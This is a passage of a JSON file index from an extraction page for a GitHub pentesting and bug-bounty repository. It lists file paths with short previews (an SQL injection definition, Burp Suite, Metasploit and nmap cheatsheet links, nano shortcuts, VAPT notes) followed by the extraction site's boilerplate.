"preview": "# Contributor Covenant Code of Conduct\n\n## Our Pledge\n\nIn the interest of fostering an open and welcoming environment, w"
},
{
"path": "Sqlinjection.md",
"chars": 451,
"preview": "*RESETSQLi()**\n\nSQL injection(SQLi) is a kind of injection vulnerability in which the attacker tries to inject arbitrary"
},
{
"path": "cheetsheets/BurpSuiteCheetsheet.md",
"chars": 1146,
"preview": "## Hunting for Vulnerabilities with Burp Suite CheatSheet v1.0 :\n \n-**Chris Dale** @chrisadale:- Users can contribute wi"
},
{
"path": "cheetsheets/Nano.md",
"chars": 2103,
"preview": "#File handling\n\n- Ctrl+S Save current file\n- Ctrl+O Offer to write file (\"Save as\")\n- Ctrl+R Insert a file into curre"
},
{
"path": "cheetsheets/Readme.md",
"chars": 543,
"preview": "# Pentesting Cheatsheets\n\nAuthor | Title\n-- | --\nChris Dale | [BurpSuite Cheatsheet v1.0](/cheetsheets/BurpSuiteCheetshe"
},
{
"path": "cheetsheets/metasploitcheetsheet.md",
"chars": 291,
"preview": "# Cheetsgeet for Metasploit \nCheatsheet | Metasploit\n-- | --\nCheat Sheet | [Metasploit Cheat Sheet v1.](https://www.kitp"
},
{
"path": "cheetsheets/nmapcheetsheet.md",
"chars": 594,
"preview": "Credit goes to the respective Author and Team RESETHACKER.\n\n# Cheetsgeet for NMAP \nCheatsheet | NMAP\n-- | --\nCheat Sheet"
},
{
"path": "enterprises.md",
"chars": 825,
"preview": "# Enterprises\n\n- Who conducts VAPT?\n> Updating Soon\n\n- Benefit of VAPT? by Simran Singh\n> VAPT offers various benefits t"
},
{
"path": "license",
"chars": 6478,
"preview": "CC0 1.0 Universal\n\nStatement of Purpose\n\nThe laws of most jurisdictions throughout the world automatically confer exclus"
}
]
// ... and 2 more files (download for full content)
About this extraction
This page contains the full source code of the RESETHACKER-COMMUNITY/Pentesting-Bugbounty GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 94 files (831.1 KB), approximately 229.7k tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.